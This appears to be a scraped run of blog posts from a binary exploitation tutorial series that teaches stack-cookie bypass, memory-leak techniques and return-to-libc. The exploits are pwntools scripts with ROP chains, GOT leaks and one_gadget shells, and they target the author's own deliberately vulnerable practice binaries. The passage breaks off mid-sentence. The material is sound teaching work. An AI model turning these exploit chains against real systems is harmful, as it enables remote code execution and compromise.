class="p">,</span> <span class="c1"># saved base pointer </span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x0000000000400b83</span><span class="p">),</span> <span class="c1"># pop rdi ; ret </span> <span class="n">p64</span><span class="p">(</span><span class="mi">4</span><span class="p">),</span> <span class="c1"># old fd </span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x0000000000400b81</span><span class="p">),</span> <span class="c1"># pop rsi ; pop r15 ; ret </span> <span class="n">p64</span><span class="p">(</span><span class="mi">0</span><span class="p">),</span> <span class="c1"># new fd </span> <span class="s">"A"</span><span class="o">*</span><span class="mi">8</span><span class="p">,</span> <span class="c1"># dummy </span> <span class="n">p64</span><span class="p">(</span><span class="n">libc_base</span> <span class="o">+</span> <span class="n">libc_elf</span><span class="p">.</span><span class="n">symbols</span><span class="p">[</span><span class="s">"dup2"</span><span class="p">]),</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x0000000000400b83</span><span class="p">),</span> <span class="c1"># pop rdi ; ret </span> <span class="n">p64</span><span class="p">(</span><span class="mi">4</span><span class="p">),</span> <span class="c1"># old fd </span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x0000000000400b81</span><span class="p">),</span> <span class="c1"># pop rsi ; pop r15 ; ret </span> <span class="n">p64</span><span class="p">(</span><span class="mi">1</span><span class="p">),</span> <span class="c1"># new fd </span> <span class="s">"A"</span><span class="o">*</span><span class="mi">8</span><span class="p">,</span> <span class="c1"># dummy </span> <span class="n">p64</span><span class="p">(</span><span class="n">libc_base</span> <span class="o">+</span> <span class="n">libc_elf</span><span class="p">.</span><span class="n">symbols</span><span class="p">[</span><span class="s">"dup2"</span><span class="p">]),</span> <span class="n">p64</span><span class="p">(</span><span class="n">libc_base</span> <span class="o">+</span> <span class="mh">0x4f322</span><span class="p">),</span> <span class="s">"</span><span class="se">\x00</span><span class="s">"</span><span class="o">*</span><span class="mi">150</span> <span class="p">])</span> </code></pre></div></div> <p>Final exploit (This time without the complete source. Follow along to get a working exploit!):</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>python exploit.py [*] Got enough data.. [*] Stack cookie is 0xfead3e7449a42700 [*] Leaking libc function addresses via GOT ... [*] Leaked: recv @ 0x7fb6b9ecfa00 [*] Leaked: fork @ 0x7fb6b9e91a50 [*] Computing libc base address in memory... [*] Libc base @ 0x7fb6b9dad000 [*] Spawning shell... [*] Switching to interactive mode $ ls cookies cookies.c exploit.py </code></pre></div></div> <hr /> <p>Great! We popped a shell and we can now defeat stack cookies!<br /> Next time, we will activate more protections and we will try to bypass all of them!<br /></p> <p>Happy Hacking!</p>made0x78Today we are going to defeat stack cookies in two different ways. We have access to the binary and we need to leak some information about its environment to write our exploit. As always, you can download the challenge. This time we have stack cookies (Canary: Yes) enabled. ``` gef➤ checksec [+] checksec for ‘./cookies’ Canary : Yes → value: 0xf28cd8655c310f00 NX : Yes PIE : No Fortify : No RelRO : PartialBinary Exploitation Series (5): How to leak data?2018-11-30T00:00:00+00:002018-11-30T00:00:00+00:00https://made0x78.com/bseries-how-to-leak-data<p>I often read the question “How to leak data?” and I will try to give you some basic ideas on how to get some information about a target (binary, memory layout).</p> <h2 id="format-string-attacks">Format String Attacks</h2> <p>If you have a format string vulnerability in the given binary you can abuse that vulnerability to leak a lot of information about the target. For example, you could leak some pointers on the stack which could leak function calls to <code class="language-plaintext highlighter-rouge">libc</code>, a pointer to the heap or the stack itself. You can also dump the whole binary if you don’t have access to the binary and may leak sensitive content. For more information please use available resources about format string attacks and try to solve old CTF challenges.<br /> Resources:<br /></p> <ul> <li><a href="https://www.youtube.com/watch?v=0WvrSfcdq1I">LiveOverflow: Simple Format String Attack</a></li> <li><a href="https://www.youtube.com/watch?v=XuzuFUGuQv0">LiveOverflow: Dump whole binary</a></li> <li><a href="http://www.cis.syr.edu/~wedu/Teaching/cis643/LectureNotes_New/Format_String.pdf">Lecture Notes (Syracuse University)</a></li> <li>Google ;-)</li> </ul> <h2 id="off-by-one">Off By One</h2> <p>In general, an off by one means that we do an operation which is one index off. In this case, we’ll write over the null byte at the end of a string.<br /> Let’s say we have again a 32-byte buffer. We need to terminate the C string with a null byte because each string function reads until a null byte. Therefore, the valid usage of this buffer would be to read 31 bytes and adding a null byte at the end (<code class="language-plaintext highlighter-rouge">buffer[31]=='\0'</code>). If the logic of the code doesn’t check that the string is null-terminated (in bounds of the array), a function like puts could leak the next values on the stack/heap/data section until it reaches a null byte.<br /> Let’s do a simple example to demonstrate the importance of the null byte:<br /></p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; </span> <span class="c1">//gcc -m64 -o off_by_one off_by_one.c -no-pie -fno-stack-protector</span> <span class="kt">void</span> <span class="nf">check_username</span><span class="p">()</span> <span class="p">{</span> <span class="kt">char</span> <span class="n">secret</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span> <span class="kt">char</span> <span class="n">name</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span> <span class="n">puts</span><span class="p">(</span><span class="s">"Name?"</span><span class="p">);</span> <span class="n">scanf</span><span class="p">(</span><span class="s">"%32s"</span><span class="p">,</span> <span class="n">name</span><span class="p">);</span> <span class="n">puts</span><span class="p">(</span><span class="s">"Secret?"</span><span class="p">);</span> <span class="n">scanf</span><span class="p">(</span><span class="s">"%32s"</span><span class="p">,</span> <span class="n">secret</span><span class="p">);</span> <span class="k">if</span><span class="p">(</span><span class="n">strcmp</span><span class="p">(</span><span class="n">name</span><span class="p">,</span> <span class="s">"admin</span><span class="se">\n</span><span class="s">"</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="n">puts</span><span class="p">(</span><span class="s">"Nope. Invalid username."</span><span class="p">);</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="n">puts</span><span class="p">(</span><span class="s">"OK"</span><span class="p">);</span> <span class="p">}</span> <span class="n">puts</span><span class="p">(</span><span class="n">name</span><span class="p">);</span> <span class="p">}</span> <span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">)</span> <span class="p">{</span> <span class="n">check_username</span><span class="p">();</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> </code></pre></div></div> <p>The function <code class="language-plaintext highlighter-rouge">check_username</code> reads two strings with <code class="language-plaintext highlighter-rouge">scanf</code> (32 bytes) and prints only the name buffer. The problem here is, that <code class="language-plaintext highlighter-rouge">scanf</code> puts a null byte after the end of the given input (first byte of secret) if we use the whole length of the string (32 byte). Therefore, the <code class="language-plaintext highlighter-rouge">name</code> string will be interpreted as a longer buffer by <code class="language-plaintext highlighter-rouge">puts</code> because the null byte of name (first byte of the secret) will be overwritten after inserting a secret. As a result, we will print the secret too.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>./off_by_one Name? AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Secret? secret OK AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAsecret </code></pre></div></div> <p>The secret will be successfully leaked. Just imagine that the secret could be anything without a null byte.<br /></p> <h2 id="leak-via-functions">Leak via Functions</h2> <p>We did that already in Chapter 4 when we leaked a libc function pointer of the <code class="language-plaintext highlighter-rouge">GOT</code> and redirected our execution flow to main to use the leaked libc address in our final exploit stage. We can abuse any function which prints or writes anything.</p> <h2 id="overwrite-pointers">Overwrite Pointers</h2> <p>Another simple way is to overwrite pointers of other strings. For example, you have a pointer to a string in a data section of the binary. You also have a relative write out of bounds using an array in the data section. Then you could overwrite the pointer to the other string which is printed later.<br /></p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; </span> <span class="c1">//gcc -m64 overwrite.c -o overwrite -no-pie -fno-stack-protector</span> <span class="kt">char</span> <span class="o">*</span><span class="n">player</span><span class="p">;</span> <span class="kt">char</span> <span class="n">xxx</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span> <span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">)</span> <span class="p">{</span> <span class="n">puts</span><span class="p">(</span><span class="s">"Welcome"</span><span class="p">);</span> <span class="n">player</span> <span class="o">=</span> <span class="n">malloc</span><span class="p">(</span><span class="mi">32</span><span class="p">);</span> <span class="n">scanf</span><span class="p">(</span><span class="s">"%31s"</span><span class="p">,</span> <span class="n">player</span><span class="p">);</span> <span class="n">printf</span><span class="p">(</span><span class="s">"Hello %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">player</span><span class="p">);</span> <span class="c1">// here you exploit some logic or function</span> <span class="c1">// e.g. overwrite characters of another string with an index (y)</span> <span class="c1">// therefore, you could do something like</span> <span class="c1">// xxx[y] = 'a';</span> <span class="c1">// xxx[0] = 'a';</span> <span class="c1">// xxx[2] = 'a';</span> <span class="c1">// xxx[-10] = 'a';</span> <span class="c1">// xxx[500] = 'a';</span> <span class="c1">// and change the pointer of player.</span> <span class="n">player</span> <span class="o">=</span> <span class="o">&amp;</span><span class="n">puts</span><span class="p">;</span> <span class="n">printf</span><span class="p">(</span><span class="s">"%p"</span><span class="p">,</span> <span class="n">player</span><span class="p">);</span> <span class="c1">// we would just print and convert with pwntools</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> </code></pre></div></div> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>./overwrite Welcome Test Hello Test 0x7fa728c809c0 </code></pre></div></div> <p>We successfully leaked puts of <code class="language-plaintext highlighter-rouge">libc</code> and we could compute the <code class="language-plaintext highlighter-rouge">libc</code> base address for further exploitation.</p> <h2 id="uninitialized-variables">Uninitialized Variables</h2> <p>Declaring variables without initializing them afterward could also leak memory addresses and data. For example, you have a buffer of size <code class="language-plaintext highlighter-rouge">n</code> and you fill the buffer with <code class="language-plaintext highlighter-rouge">n/2</code> bytes. Then you’ll save the whole buffer (<code class="language-plaintext highlighter-rouge">n</code>) into a file byte by byte. Therefore, you’ll write n/2 bytes which are unknown into the file.<br /> Here you can see a simple example of such a behavior.</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; </span> <span class="c1">//gcc -m64 -o uninitialized_variable uninitialized_variable.c -no-pie</span> <span class="kt">void</span> <span class="nf">check_username</span><span class="p">()</span> <span class="p">{</span> <span class="kt">char</span> <span class="n">name</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span> <span class="kt">char</span> <span class="n">secret</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span> <span class="n">puts</span><span class="p">(</span><span class="s">"Name?"</span><span class="p">);</span> <span class="n">scanf</span><span class="p">(</span><span class="s">"%32s"</span><span class="p">,</span> <span class="n">name</span><span class="p">);</span> <span class="n">puts</span><span class="p">(</span><span class="s">"Secret?"</span><span class="p">);</span> <span class="n">scanf</span><span class="p">(</span><span class="s">"%32s"</span><span class="p">,</span> <span class="n">secret</span><span class="p">);</span> <span class="k">if</span><span class="p">(</span><span class="n">strcmp</span><span class="p">(</span><span class="n">name</span><span class="p">,</span> <span class="s">"admin</span><span class="se">\n</span><span class="s">"</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="n">puts</span><span class="p">(</span><span class="s">"Nope. Invalid username."</span><span class="p">);</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="n">puts</span><span class="p">(</span><span class="s">"OK"</span><span class="p">);</span> <span class="p">}</span> <span class="n">puts</span><span class="p">(</span><span class="n">name</span><span class="p">);</span> <span class="p">}</span> <span class="kt">void</span> <span class="nf">x</span><span class="p">()</span> <span class="p">{</span> <span class="kt">char</span> <span class="n">x</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span> <span class="k">for</span><span class="p">(</span><span class="kt">int</span> <span class="n">i</span><span class="o">=</span><span class="mi">0</span><span class="p">;</span> <span class="n">i</span><span class="o">&lt;</span><span class="mi">32</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span> <span class="n">printf</span><span class="p">(</span><span class="s">"%x"</span><span class="p">,</span> <span class="n">x</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span> <span class="p">}</span> <span class="p">}</span> <span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">)</span> <span class="p">{</span> <span class="n">check_username</span><span class="p">();</span> <span class="n">x</span><span class="p">();</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> </code></pre></div></div> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>./uninitialized_variable Name? AAAA Secret? BBBB OK AAAA 4242424207f001000000010000000ffffffed74000000 </code></pre></div></div> <p>We successfully leaked our secret and some other values.</p> <h2 id="brute-force">Brute Force</h2> <p>The last approach for today is brute force. In the best case, your target will fork its process because then you have a similar memory for each execution. For example, if you have a master process that forks, the child processes have always the same stack cookie. Hence, we can leak the stack cookie byte by byte (see Chapter 6).<br /> Brute force is also useful with position-independent code. For example, you could guess the return address and the saved base pointer of the binary by brute-forcing bytes.<br /> Let’s say our stack looks like that:<br /></p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>... local parameters, buffer overflow 0x00007ffff7dd7660 saved base pointer 0x0000555555554896 return address .... arguments .... parent function </code></pre></div></div> <p>Let’s say that after the function returns to the parent function (<code class="language-plaintext highlighter-rouge">0x0000555555554896</code>) it will print “Successful”. Now, we could overwrite the least significant byte with 00, 01, 02, 03 … until we see “Successful” (60) again. Then we can overwrite the second byte and do the same again 0060, 0160, 0260, … 7660 -&gt; “Successful”.<br /> Now, we know an address of the stack and an address of a binary instruction in memory which is essential if you deal with position-independent code.</p> <hr /> <p>This post did not cover all possible ways but it gives you an idea of how to get some data in some cases. The most important thing is, that you have to be creative with everything you know about the binary and try to understand how it behaves.<br /></p> <p>Happy Hacking!</p>made0x78I often read the question “How to leak data?” and I will try to give you some basic ideas on how to get some information about a target (binary, memory layout).Binary Exploitation Series (4): Return to Libc2018-11-17T00:00:00+00:002018-11-17T00:00:00+00:00https://made0x78.com/bseries-ret2libc<p>This time we will activate non-executable stack and we’re going to build our first mini ROP-Chain to leak memory addresses! Basic ASLR is of course still enabled (only Heap and Stack randomized). I will also introduce some more features of <code class="language-plaintext highlighter-rouge">pwntools</code>.</p> <h2 id="target">Target</h2> <p>The <a href="/downloads/bseries/chapter_4/chapter_4">target</a> is again a simple binary where we can spot the vulnerability after a few seconds. In the function <code class="language-plaintext highlighter-rouge">check_username</code> we declare a 32-byte buffer to store a username. After that, we prompt the user to input a name but the <code class="language-plaintext highlighter-rouge">fgets</code> call reads up to 200 bytes which could lead again to a buffer overflow.</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; </span> <span class="c1">//gcc -m64 -o chapter_4 chapter_4.c -no-pie -fno-stack-protector</span> <span class="kt">void</span> <span class="nf">check_username</span><span class="p">()</span> <span class="p">{</span> <span class="kt">char</span> <span class="n">name</span><span class="p">[</span><span class="mi">32</span><span class="p">];</span> <span class="n">puts</span><span class="p">(</span><span class="s">"Name?"</span><span class="p">);</span> <span class="n">fgets</span><span class="p">(</span><span class="n">name</span><span class="p">,</span> <span class="mi">200</span><span class="p">,</span> <span class="n">stdin</span><span class="p">);</span> <span class="k">if</span><span class="p">(</span><span class="n">strcmp</span><span class="p">(</span><span class="n">name</span><span class="p">,</span> <span class="s">"admin</span><span class="se">\n</span><span class="s">"</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span> <span class="n">puts</span><span class="p">(</span><span class="s">"Nope. Invalid username."</span><span class="p">);</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="n">puts</span><span class="p">(</span><span class="s">"OK"</span><span class="p">);</span> <span class="p">}</span> <span class="p">}</span> <span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">**</span><span class="n">argv</span><span class="p">)</span> <span class="p">{</span> <span class="n">check_username</span><span class="p">();</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> </code></pre></div></div> <h2 id="analysis">Analysis</h2> <p>Since we know a little bit about <code class="language-plaintext highlighter-rouge">pwntools</code>, thanks to the last post, and we have the source code of the target, we can directly start writing our exploit. First, import all <code class="language-plaintext highlighter-rouge">pwntools</code> functions and load the binary.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="n">r</span> <span class="o">=</span> <span class="n">process</span><span class="p">(</span><span class="s">"./chapter_4"</span><span class="p">)</span> <span class="n">context</span><span class="p">.</span><span class="n">binary</span> <span class="o">=</span> <span class="s">'./chapter_4'</span> </code></pre></div></div> <p>Then we will attach the debugger <code class="language-plaintext highlighter-rouge">gdb</code> again …</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1"># attach gdb and continue </span><span class="n">gdb</span><span class="p">.</span><span class="n">attach</span><span class="p">(</span><span class="n">r</span><span class="p">.</span><span class="n">pid</span><span class="p">,</span> <span class="s">"""c"""</span><span class="p">)</span> </code></pre></div></div> <p>… and we trigger the buffer overflow with a simple payload.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">payload</span> <span class="o">=</span> <span class="s">"A"</span><span class="o">*</span><span class="mi">50</span> <span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> <span class="n">r</span><span class="p">.</span><span class="n">interactive</span><span class="p">()</span> <span class="c1"># we don't want to close the application </span></code></pre></div></div> <p>Crashed, perfect!<br /> Next, we try to find the offset to the return address on the stack. This can be done manually with static or dynamic analysis or we just use <code class="language-plaintext highlighter-rouge">gdb</code> and a really useful <a href="http://docs.pwntools.com/en/stable/util/cyclic.html">pwntools function</a>. Let’s change the payload to <code class="language-plaintext highlighter-rouge">payload = cyclic(50)</code> and run it again. Crashed. Now we can compute the offset to the return address by taking a word (w) at the top of the stack (<code class="language-plaintext highlighter-rouge">rsp</code>) as an argument to pwntools’ <code class="language-plaintext highlighter-rouge">cyclic_find</code> function.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>gef➤ x/wx $rsp 0x7ffecfec1e98: 0x6161616b # ipython In [1]: from pwn import * In [2]: cyclic_find(0x6161616b) Out[2]: 40 </code></pre></div></div> <p>Ok, we have an offset of 40 to the return address of this function (32-byte buffer + 8 byte which is the saved base pointer).<br /></p> <p>Since we can’t execute our shellcode on the stack, we have to find another way. For now, we do the following steps to achieve code execution:<br /></p> <ul> <li>Leak libc pointers via <code class="language-plaintext highlighter-rouge">GOT</code> (Global Offset Table) <ul> <li>Leak pointer to <code class="language-plaintext highlighter-rouge">puts</code></li> </ul> </li> <li>Identify libc library (optional, in this case not necessary) <ul> <li>Leak another pointer to <code class="language-plaintext highlighter-rouge">fgets</code></li> <li>Use leaked pointers of <code class="language-plaintext highlighter-rouge">puts</code> and <code class="language-plaintext highlighter-rouge">fgets</code> to find the correct libc</li> </ul> </li> <li>Compute libc’ base address</li> <li>Find a suitable one-shot gadget to achieve code execution</li> <li>Maybe find suitable gadgets to modify the registers for the one-shot gadget (in this case not necessary)</li> <li>Redirect execution to the vulnerable function (otherwise the executable would exit)</li> <li>Exploit the same vulnerability a second time and pop a shell!</li> </ul> <p>First, we have to call the function <code class="language-plaintext highlighter-rouge">puts</code> with a <code class="language-plaintext highlighter-rouge">GOT</code> address as argument to read the pointer. We can also use <code class="language-plaintext highlighter-rouge">pwntools</code> to support us in our exploit development. Since we exploiting the program locally we can use <code class="language-plaintext highlighter-rouge">ldd</code> to obtain the used libc.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># Find the used libc (obviously our local libc since this is a local challenge) ldd ./chapter_4 linux-vdso.so.1 (0x00007fffe21a6000) libc.so.6 =&gt; /lib/x86_64-linux-gnu/libc.so.6 (0x00007f37310e9000) /lib64/ld-linux-x86-64.so.2 (0x00007f37314da000) </code></pre></div></div> <p>Next, we load the libc in our python script for later use <code class="language-plaintext highlighter-rouge">libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")</code> and we use <code class="language-plaintext highlighter-rouge">pwntools</code> features to call <code class="language-plaintext highlighter-rouge">puts</code> with the correct address. Since puts uses one argument we have to set the <code class="language-plaintext highlighter-rouge">rdi</code> register (<a href="https://en.wikipedia.org/wiki/X86_calling_conventions#x86-64_calling_conventions">Read more about calling conventions</a>).</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># find a suitable gadget to set rdi ROPgadget --binary chapter_4 | grep rdi 0x00000000004006b3 : pop rdi ; ret &lt;-------------------------- 0x0000000000400594 : scasd eax, dword ptr [rdi] ; or ah, byte ptr [rax] ; add byte ptr [rcx], al ; pop rbp ; ret </code></pre></div></div> <p>We use the gadget to set the <code class="language-plaintext highlighter-rouge">rdi</code> register and call <code class="language-plaintext highlighter-rouge">puts</code>. This will print the address of the <code class="language-plaintext highlighter-rouge">GOT</code> entry and we can convert the leaked binary string to an integer with <code class="language-plaintext highlighter-rouge">pwntools</code> (<code class="language-plaintext highlighter-rouge">u64()</code>, 8 bytes unpack). Then we just have to subtract the offset of <code class="language-plaintext highlighter-rouge">puts</code> of our local libc to get the base address of the mapped libc in memory.<br /></p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="k">def</span> <span class="nf">pad_null_bytes</span><span class="p">(</span><span class="n">value</span><span class="p">):</span> <span class="k">return</span> <span class="n">value</span> <span class="o">+</span> <span class="s">'</span><span class="se">\x00</span><span class="s">'</span> <span class="o">*</span> <span class="p">(</span><span class="mi">8</span><span class="o">-</span><span class="nb">len</span><span class="p">(</span><span class="n">value</span><span class="p">))</span> <span class="n">chapter_4_elf</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s">"./chapter_4"</span><span class="p">)</span> <span class="n">r</span> <span class="o">=</span> <span class="n">chapter_4_elf</span><span class="p">.</span><span class="n">process</span><span class="p">()</span> <span class="n">context</span><span class="p">.</span><span class="n">binary</span> <span class="o">=</span> <span class="s">'./chapter_4'</span> <span class="c1"># libc </span><span class="n">libc</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="s">"/lib/x86_64-linux-gnu/libc.so.6"</span><span class="p">)</span> <span class="c1"># attach gdb and continue </span><span class="n">gdb</span><span class="p">.</span><span class="n">attach</span><span class="p">(</span><span class="n">r</span><span class="p">.</span><span class="n">pid</span><span class="p">,</span> <span class="s">"""c"""</span><span class="p">)</span> <span class="n">payload</span> <span class="o">=</span> <span class="s">""</span><span class="p">.</span><span class="n">join</span><span class="p">([</span><span class="s">"A"</span><span class="o">*</span><span class="mi">40</span><span class="p">,</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x00000000004006b3</span><span class="p">),</span> <span class="c1"># pop rdi ; ret </span> <span class="n">p64</span><span class="p">(</span><span class="n">chapter_4_elf</span><span class="p">.</span><span class="n">got</span><span class="p">[</span><span class="s">"puts"</span><span class="p">]),</span> <span class="c1"># value for rdi </span> <span class="n">p64</span><span class="p">(</span><span class="n">chapter_4_elf</span><span class="p">.</span><span class="n">symbols</span><span class="p">[</span><span class="s">"puts"</span><span class="p">]),</span> <span class="c1"># return address </span> <span class="s">"C"</span><span class="o">*</span><span class="mi">50</span><span class="p">])</span> <span class="n">r</span><span class="p">.</span><span class="n">clean</span><span class="p">()</span> <span class="c1"># clean socket buffer (read all and print) </span><span class="n">r</span><span class="p">.</span><span class="n">sendline</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> <span class="c1"># send payload </span><span class="n">r</span><span class="p">.</span><span class="n">recvuntil</span><span class="p">(</span><span class="s">"OK</span><span class="se">\n</span><span class="s">"</span><span class="p">)</span> <span class="c1"># read until OK\n </span><span class="n">puts_leak</span> <span class="o">=</span> <span class="n">u64</span><span class="p">(</span><span class="n">pad_null_bytes</span><span class="p">(</span><span class="n">r</span><span class="p">.</span><span class="n">readline</span><span class="p">()))</span> <span class="c1"># null byte padding + unpack to integer(8 byte) </span><span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">"Puts @ %s"</span> <span class="o">%</span> <span class="nb">hex</span><span class="p">(</span><span class="n">puts_leak</span><span class="p">))</span> <span class="n">libc_base</span> <span class="o">=</span> <span class="n">puts_leak</span> <span class="o">-</span> <span class="n">libc</span><span class="p">.</span><span class="n">symbols</span><span class="p">[</span><span class="s">"puts"</span><span class="p">]</span> <span class="c1"># compute libc base </span><span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">"libc base @ %s"</span> <span class="o">%</span> <span class="nb">hex</span><span class="p">(</span><span class="n">libc_base</span><span class="p">))</span> <span class="n">r</span><span class="p">.</span><span class="n">interactive</span><span class="p">()</span> <span class="c1"># we don't want to close the application </span></code></pre></div></div> <p>Output of our script:<br /></p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[+] Waiting for debugger: Done [*] Puts @ 0x7f97bd13f9c0 [*] libc base @ 0x7f97bd0bf000 &lt;---- [*] Switching to interactive mode # Verify puts in gdb p puts $1 = {int (const char *)} 0x7f97bd13f9c0 &lt;_IO_puts&gt; &lt;---- # Verify libc base with vmmap 0x00007f97bd0bf000 0x00007f97bd2a6000 0x0000000000000000 r-x /lib/x86_64-linux-gnu/libc-2.27.so &lt;---- 0x00007f97bd2a6000 0x00007f97bd4a6000 0x00000000001e7000 --- /lib/x86_64-linux-gnu/libc-2.27.so 0x00007f97bd4a6000 0x00007f97bd4aa000 0x00000000001e7000 r-- /lib/x86_64-linux-gnu/libc-2.27.so 0x00007f97bd4aa000 0x00007f97bd4ac000 0x00000000001eb000 rw- /lib/x86_64-linux-gnu/libc-2.27.so </code></pre></div></div> <p>Perfect, the addresses are the same!<br /> If we don’t know the libc version we have to leak other addresses like <code class="language-plaintext highlighter-rouge">fgets</code> and <code class="language-plaintext highlighter-rouge">strcmp</code> and use <a href="https://libc.blukat.me/">blukat.me</a> to identify the correct version. When we found the correct one, we can download the libc from the website. Since we do everything locally, we can just skip this part.<br /></p> <p>Before we look for a one-shot gadget, we need a way to interact with the binary after receiving the leaked addresses because ASLR would randomize the addresses on every startup again. Therefore, we just redirect the execution flow to the beginning and just exploit the buffer overflow a second time.<br /></p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">payload</span> <span class="o">=</span> <span class="s">""</span><span class="p">.</span><span class="n">join</span><span class="p">([</span><span class="s">"A"</span><span class="o">*</span><span class="mi">40</span><span class="p">,</span> <span class="n">p64</span><span class="p">(</span><span class="mh">0x00000000004006b3</span><span class="p">),</span> <span class="c1"># pop rdi ; ret </span> <span class="n">p64</span><span class="p">(</span><span class="n">chapter_4_elf</span><span class="p">.</span><span class="n">got</span><span class="p">[</span><span class="s">"puts"</span><span class="p">]),</span> <span class="c1"># value for rdi </span> <span class="n">p64</span><span class="p">(</span><span class="n">chapter_4_elf</span><span class="p">.</span><span class="n">symbols</span><span class="p">[</span><span class="s">"puts"</span><span class="p">]),</span> <span class="c1"># return address </span> <span class="n">p64</span><span class="p">(</span><span class="n">chapter_4_elf</span><span class="p">.</span><span class="n">symbols</span><span class="p">[</span><span class="s">"main"</span><span class="p">]),</span> <span class="c1"># return to main </span> <span class="s">"C"</span><span class="o">*</span><span class="mi">50</span><span class="p">])</span> <span class="o">--&gt;</span> <span class="n">Output</span><span class="p">:</span> <span class="p">[</span><span class="o">*</span><span class="p">]</span> <span class="n">Puts</span> <span class="o">@</span> <span class="mh">0x7f0fa54599c0</span> <span class="p">[</span><span class="o">*</span><span class="p">]</span> <span class="n">libc</span> <span class="n">base</span> <span class="o">@</span> <span class="mh">0x7f0fa53d9000</span> <span class="p">[</span><span class="o">*</span><span class="p">]</span> <span class="n">Switching</span> <span class="n">to</span> <span class="n">interactive</span> <span class="n">mode</span> <span class="n">Name</span><span class="err">?</span> <span class="err">$</span> </code></pre></div></div> <p>Just copy the payload and send it again and we see the same crash as at the beginning!<br /> Next, we have to identify a one-shot gadget. For that, we can use the program <code class="language-plaintext highlighter-rouge">one_gadget</code> with the identified libc.</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>one_gadget /lib/x86_64-linux-gnu/libc.so.6 0x4f2c5 execve("/bin/sh", rsp+0x40, environ) constraints: rcx == NULL 0x4f322 execve("/bin/sh", rsp+0x40, environ) constraints: [rsp+0x40] == NULL 0x10a38c execve("/bin/sh", rsp+0x70, environ) constraints: [rsp+0x70] == NULL </code></pre></div></div> <p>Ok, we have some constraints…<br /> If we take a look at the stack in <code class="language-plaintext highlighter-rouge">gdb</code> after the 